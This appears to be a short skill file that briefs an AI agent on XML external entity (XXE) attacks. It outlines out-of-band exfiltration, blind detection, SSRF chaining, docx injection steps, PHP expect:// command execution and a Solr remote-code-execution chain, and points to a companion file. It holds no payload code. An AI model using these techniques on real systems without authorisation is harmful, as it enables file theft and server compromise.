SKILL: XML External Entity Injection (XXE) — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion SCENARIOS.md.

0. RELATED ROUTING

Also load:

• upload insecure files when XXE is reachable through SVG, OOXML, import, or preview pipelines

Extended Scenarios

Also load SCENARIOS.md when you need:

• Apache Solr XXE + RCE chain (CVE-2017-12629) — XXE to read config, then VelocityResponseWriter for RCE
• Office docx XXE step-by-step — unzip → inject DOCTYPE into word/document.xml or [Content_Types].xml → repackage → upload
• DOCTYPE-based blind SSRF — PUBLIC external DTD reference triggers HTTP callback without entity reflection
• PHP expect:// protocol via XXE — direct command execution when expect extension is installed
• Blind XXE via error messages — force file path error that leaks content in exception text
• XXE in SOAP web services — inject entities into SOAP Envelope/Body elements